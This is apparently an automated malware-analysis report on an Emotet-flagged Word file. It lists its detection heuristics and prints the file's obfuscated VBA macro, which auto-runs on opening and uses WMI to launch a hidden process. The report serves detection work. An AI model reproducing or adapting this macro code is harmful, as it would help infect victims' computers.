MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Malware.Emotet-7540219-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emotet-7540219-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set Afomearpyrlb = GetObject(Vshtocor) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11139 bytes |
SHA-256: e27417742d7119688d67fc189fe3abeeca8bc8bb5082e13849168b82b627a447 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
205 of 317 identifiers look randomly generated (e.g. 'Etwprzltkyrbp') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Rncwejxkc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Iiyvvjoo
End Sub
Attribute VB_Name = "Whaeodtqkqi"
Attribute VB_Base = "0{52D0F05A-089C-4C08-9B1B-AB764DB4D7B5}{36B4AEC5-77EA-4BAB-AC54-D80C3EA04A94}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Aplhseob"
Function Yenwuidyxwz()
Do While Jmgtmxgu = 9875
Do While Okladkfofrymd = 34
Fvatlefspdlgu = Cos(8 + CStr(750))
Loop
Do While Nfotlpltbvw = 123
Kewjjwhbf = Vjswwrelcoet
Khuczxoeyi = 3253
Loop
Do While Cwyfohevy = 667
Owjrlxrfkyzzo = CDbl(324)
Gceqkjkqphnwa = Int(496)
Loop
Do While Clikffpgdhh = 2342
Hcxjsobb = CInt(Soegujyar)
Loop
Do While Woqdhtrwbidhj = 3247
Jdelvnkcpwa = Sgn(713)
Xegpsekngfku = CByte(Qzoguxhzv + Oimmbhguw)
Loop
Loop
Bhmfieewqmax = ChrW(wdKeyP)
Do While Uaufrffcie = 9875
Do While Hyhfzjzzj = 34
Ztebuipda = Cos(8 + CStr(750))
Loop
Do While Ijpugstoh = 123
Sxbpmdwclzvvu = Elutaeeapx
Cggvsldah = 3253
Loop
Do While Vlhyqgmou = 667
Nitntrnwlswz = CDbl(324)
Fedjqleegyht = Int(496)
Loop
Do While Ucjvvitybes = 2342
Lomzmndlcj = CInt(Xpjbvgzk)
Loop
Do While Iibdlchc = 3247
Eytqtzufddr = Sgn(713)
Rysjwgysc = CByte(Fdxjcadzkn + Wtivlugwkqeke)
Loop
Loop
Yzofkzbu = Bhmfieewqmax + Whaeodtqkqi.Ekqdonwu + Whaeodtqkqi.Wnbyoebd
Do While Qnfrughmtanf = 9875
Do While Wnrtcnbetzjp = 34
Kzrnucvavp = Cos(8 + CStr(750))
Loop
Do While Oevffomw = 123
Ctgutmtgied = Tjzkswws
Zzxinuudhjvx = 3253
Loop
Do While Aiihpgvar = 667
Wfetaewz = CDbl(324)
Vvdflnbwn = Int(496)
Loop
Do While Lskjnodvyzivg = 2342
Qkgezxyafnf = CInt(Stddwfln)
Loop
Do While Mptebhmzxo = 3247
Rpjgynrewinzc = Sgn(713)
Ezagbvauogtw = CByte(Nimgvcouphxv + Dctcwliawi)
Loop
Loop
Ctnwawndbnwwg = Split(Yzofkzbu + LTrim(LTrim(Whaeodtqkqi.Zazqvyncyowi. _
Tag)), ",,,,sdf7&&jsad,,,")
Do While Lmwfcmwjdvx = 9875
Do While Rborgbgodrg = 34
Nvlzgssowbrl = Cos(8 + CStr(750))
Loop
Do While Aftmqgvtudj = 123
Daiuqzjz = Doeqcuzwfsmgi
Pzxtbipfs = 3253
Loop
Do While Ogaleqyhpym = 667
Yugeiowrypbz = CDbl(324)
Apojmbogs = Int(496)
Loop
Do While Owibtgcjfvgc = 2342
Etwprzltkyrbp = CInt(Erbkkuroqfi)
Loop
Do While Fjtncmihrrb = 3247
Uljkrrcvb = Sgn(713)
Rbbmfgkjb = CByte(Aedzcrgmazn + Fegnqvuegovbk)
Loop
Loop
Yenwuidyxwz = Zlcfvwfxnhb + Join(Ctnwawndbnwwg, "") + Zlcfvwfxnhb
Do While Jhbqjhfftekb = 9875
Do While Vvdulhuz = 34
Kiirqgyi = Cos(8 + CStr(750))
Loop
Do While Ogjwzpfdphryb = 123
Zpwvibkf = Bznonfcsb
Mgvvbqjvjlg = 3253
Loop
Do While Rqcmaxebirx = 667
Obbpgaymmjbz = CDbl(324)
Ajrtuewxxd = Int(496)
Loop
Do While Dlmeoxfjciuu = 2342
Weehanumd = CInt(Yclwqexzown)
Loop
Do While Uduwispxoo = 3247
Tpcbxqhunqvt = Sgn(713)
Dwuqkievnx = CByte(Elcskodexpvyr + Fvdiajwot)
Loop
Loop
End Function
Function Iiyvvjoo()
a = ",,,,sdf7&&jsad,,,in,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,m,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,gm,,,,sdf7&&jsad,,,t,,,,sdf7&&jsad,,," + ChrW(wdKeyS) + ",,,,sdf7&&jsad,,,:w,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,i,,,,sdf7&&jsad,,,n3,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,2_" + Whaeodtqkqi.Cvavxyjtjdn + "r,,,,sdf7&&jsad,,,oces,,,,sdf7&&jsad,,,s"
Do While Iobxqiolgca = 9875
Do While Aeqncvcf = 34
Syhapnfbz = Cos(8 + CStr(750))
Loop
Do While Gycatwfk = 123
Ofkfduekdki = Iyihyxabb
Tgomizwvsqdtw = 3253
Loop
Do While Tbqvuswrtc = 667
Hmfpmolmxgr = CDbl(324)
Nnsqffmm = Int(496)
Loop
Do While Ykfwgxpuk = 2342
Pinbqelipm = CInt(Shfeanxybvh)
Loop
Do While Hsfphlhds = 3247
Fpoaaewro = Sgn(713)
Pasogmzitbg = CByte(Lfthbclzja + Zwxxyqritd)
Loop
Loop
q = ",,,,sdf7&&jsad,,,"
Do While Zzklipkkwt = 9875
Do While Efqweqoezhxjf = 34
Gwbjgjtczyhbp = Cos(8 + CStr(750))
Loop
Do While Yvcvzxieycukk = 123
Bggtenvk = Kdrxwpyzcjc
Dyxscglyjk = 3253
Loop
Do While Bvwzjckkgourg = 667
Wkiiatwcuhu = CDbl(324)
Fqbsuavt = Int(496)
Loop
Do While Sgrxcpeglatpn = 2342
Wdesbsoj = CInt(Pmbwfhttl)
Loop
Do While Iwtnqbjs = 3247
Daqxxqbagdx = Sgn(713)
Nccjgszvckao = CByte(Flrfqyomml + Qstemezeg)
Loop
Loop
Myeyqpnmll = Split(",,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,w,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,," + a, q)
Do While Gqlxiiybbzyz = 9875
Do While Smcidbwdktmzu = 34
Rpabpyhquuj = Cos(8 + CStr(750))
Loop
Do While Mbdszwwlhhqu = 123
Grljoqlk = Ybzlvhnugerjp
Ylfkhkhtwazjl = 3253
Loop
Do While Hbqguywk = 667
Twnskxbrjqfgz = CDbl(324)
Rhdlwybycwp = Int(496)
Loop
Do While Zabapknntb = 2342
Xrbfybbn = CInt(Qtztarxl)
Loop
Do While Erriofrppzxg = 3247
Ygatdvoer = Sgn(713)
Havkvqifry = CByte(Sqtkmytf + Rvtrdhzg)
Loop
Loop
Vshtocor = Join(Myeyqpnmll, "")
Do While Cnzqbzydtler = 9875
Do While Bcvitston = 34
Qynmxhbrlqp = Cos(8 + CStr(750))
Loop
Do While Avxlwlidgd = 123
Skceanawbkakq = Davplymi
Hsbvkkvbnewyn = 3253
Loop
Do While Phgqvmuz = 667
Dkoaafcfi = CDbl(324)
Zarzfjdrgfnl = Int(496)
Loop
Do While Qfrbinttqgaga = 2342
Userjqgpqpdrh = CInt(Qzdejakdzfafk)
Loop
Do While Zjqsmmitbfjqb = 3247
Vlrrqbcvd = Sgn(713)
Pemikwerqu = CByte(Onifbyajjru + Osuxwnntdwd)
Loop
Loop
Set Afomearpyrlb = GetObject(Vshtocor)
Do While Shrluiee = 9875
Do While Rgitsbjecx = 34
Evsqamteve = Cos(8 + CStr(750))
Loop
Do While Glvrckol = 123
Lufgtnnovsi = Wteirkrp
Emhfscsjjqpj = 3253
Loop
Do While Ttgrhjuuzi = 667
Xbwaeyycbtmiv = CDbl(324)
Izqnmwto = Int(496)
Loop
Do While Aidxkmzf = 2342
Qnilrlujz = CInt(Vvgmujunbenxw)
Loop
Do While Verhncbhmvr = 3247
Abjorfemxlpde = Sgn(713)
Acplhaqqsstv = CByte(Tqddynzuygr + Xsbdikig)
Loop
Loop
Wgyesebfjld = Vshtocor + ChrW(wdKeyS) + Whaeodtqkqi.Mimxrfhqw.ControlTipText$ + Whaeodtqkqi.Rniyztrqdcmv.ControlTipText
Do While Dbamuqzza = 9875
Do While Ewhdokrcl = 34
Wvjppyna = Cos(8 + CStr(750))
Loop
Do While Ekwewauj = 123
Zvftcirvebz = Beeceaal
Gamkyskx = 3253
Loop
Do While Ncaqpnghswib = 667
Vzrxpjrbz = CDbl(324)
Tqxsdtegxpydo = Int(496)
Loop
Do While Uttdremepya = 2342
Jamdgrwxi = CInt(Ceuqsxwdkyp)
Loop
Do While Wcugliucg = 3247
Wdvxwqulffanj = Sgn(713)
Scxcjucehd = CByte(Laulwhxtpby + Edtcvpkkyqrf)
Loop
Loop
Owaqkpxm = Wgyesebfjld + Whaeodtqkqi.Cvavxyjtjdn
Do While Ljorxlimtlxuz = 9875
Do While Zuezgeuxneg = 34
Mdhexyjstwp = Cos(8 + CStr(750))
Loop
Do While Rnrdophhay = 123
Isrlbmqk = Qesxbsyg
Axngfjprthl = 3253
Loop
Do While Bofrgrjyoqq = 667
Kroojtaccle = CDbl(324)
Swzrlomor = Int(496)
Loop
Do While Arooqlgwjszy = 2342
Ysdnydaga = CInt(Yxeclztjso)
Loop
Do While Llreibnty = 3247
Nwiasfuuqpc = Sgn(713)
Cuysgpjqgms = CByte(Ysengobkr + Yaeytbqj)
Loop
Loop
Set Iiyvvjoo = GetObject(Owaqkpxm)
Do While Bqbthtqnot = 9875
Do While Odfggsslgmn = 34
Hiioamosl = Cos(8 + CStr(750))
Loop
Do While Peagqkngtz = 123
Bcpxrddocrl = Iyngtwdawr
Lvvyhpipugm = 3253
Loop
Do While Woiogxtavhm = 667
Acnnfkngfihqv = CDbl(324)
Kqclcrwi = Int(496)
Loop
Do While Puiqqojxio = 2342
Hbcxiqga = CInt(Vpqffayhdu)
Loop
Do While Ppeppuys = 3247
Xiibjejgbuo = Sgn(713)
Saliizakljglm = CByte(Amcfyhshwert + Sxnlqlpelqsmc)
Loop
Loop
Iiyvvjoo. _
showwindow = False
Do While Ogouyughtmzdq = 9875
Do While Kyubuipyillsn = 34
Dooseguvckgb = Cos(8 + CStr(750))
Loop
Do While Vqwenkqbwany = 123
Jmbtncilp = Ppdrrogvem
Oajacrnefxo = 3253
Loop
Do While Inosmkbyuxv = 667
Flhdetoxns = CDbl(324)
Gtbtesas = Int(496)
Loop
Do While Bsdsctqtc = 2342
Rmbxbtvxsvu = CInt(Fqafpfuujwk)
Loop
Do While Lqvhtppmogzwc = 3247
Vjnghmmls = Sgn(713)
Xttiqqic = CByte(Bkbevdrja + Hozzjeinzec)
Loop
Loop
Do While Afomearpyrlb.Create(n & Yenwuidyxwz, Qzptbycrcp, Iiyvvjoo, Ezafznchyx)
Loop
Do While Ezroijkdj = 9875
Do While Ornkjlpivhajl = 34
Xmkgwtjpucy = Cos(8 + CStr(750))
Loop
Do While Bmkcefgvmfc = 123
Afydpgdulxtc = Fbthkabh
Yfgeslhhtdsdr = 3253
Loop
Do While Shtporzxcb = 667
Xsmrswbfkzzb = CDbl(324)
Ljdkbkcvrsh = Int(496)
Loop
Do While Gyhedyskpgla = 2342
Kcsirqygqur = CInt(Qbaukbcuhc)
Loop
Do While Dgfvcrkvustyk = 3247
Vainmdpc = Sgn(713)
Mbyeudzxlok = CByte(Ocheoxibjt + Uypjsndwg)
Loop
Loop
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.